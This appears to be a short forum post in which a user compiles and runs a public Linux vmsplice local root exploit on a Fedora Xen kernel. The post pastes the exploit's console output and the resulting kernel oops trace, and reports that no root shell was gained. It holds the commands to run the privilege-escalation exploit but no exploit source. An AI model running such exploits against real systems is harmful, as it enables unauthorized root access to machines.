http://justfuckinggoogleit.com/
gcc -o exploit 27704.c
./expoit
gimme at 2.6.21-2952.fc8xen (didn't get root shell)
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ef4000 .. 0xb7f26000
Segmentation fault
[asraikhn@xxxx ~]$
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: Oops: 0000 [#1]
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: SMP
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: CPU: 0
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: EIP: 0061:[<080487f5>] Not tainted VLI
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: EFLAGS: 00210293 (2.6.21-2952.fc8xen #1)
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: EIP is at 0x80487f5
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: eax: e9000003 ebx: 00000004 ecx: 00000000 edx: 00004000
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: esi: c3c79f8c edi: ffffffe0 ebp: c3c79e70 esp: c3c79e5c
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0069
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: Process exploit (pid: 26415, ti=c3c79000 task=c14217d0 task.ti=c3c79000)
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: Stack: 0000000d 00000000 e9000003 e9000003 00000004 00000001 c1058163 c108adbd
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: 00000000 00000000 00000000 00000000 00000030 00000030 bfe230b8 c108b9e7
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: ffffffd0 00000000 00000000 c3c79f4c 00000000 c3c7a00c c181b120 c039ba00
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: Call Trace:
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: [<c1058163>] put_compound_page+0x13/0x14
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: [<c108adbd>] splice_to_pipe+0x1c7/0x1d6
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: [<c108b9e7>] sys_vmsplice+0x262/0x28b
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: =======================
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: Code: Bad EIP value.
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: EIP: [<080487f5>] 0x80487f5 SS:ESP 0069:c3c79e5c
regards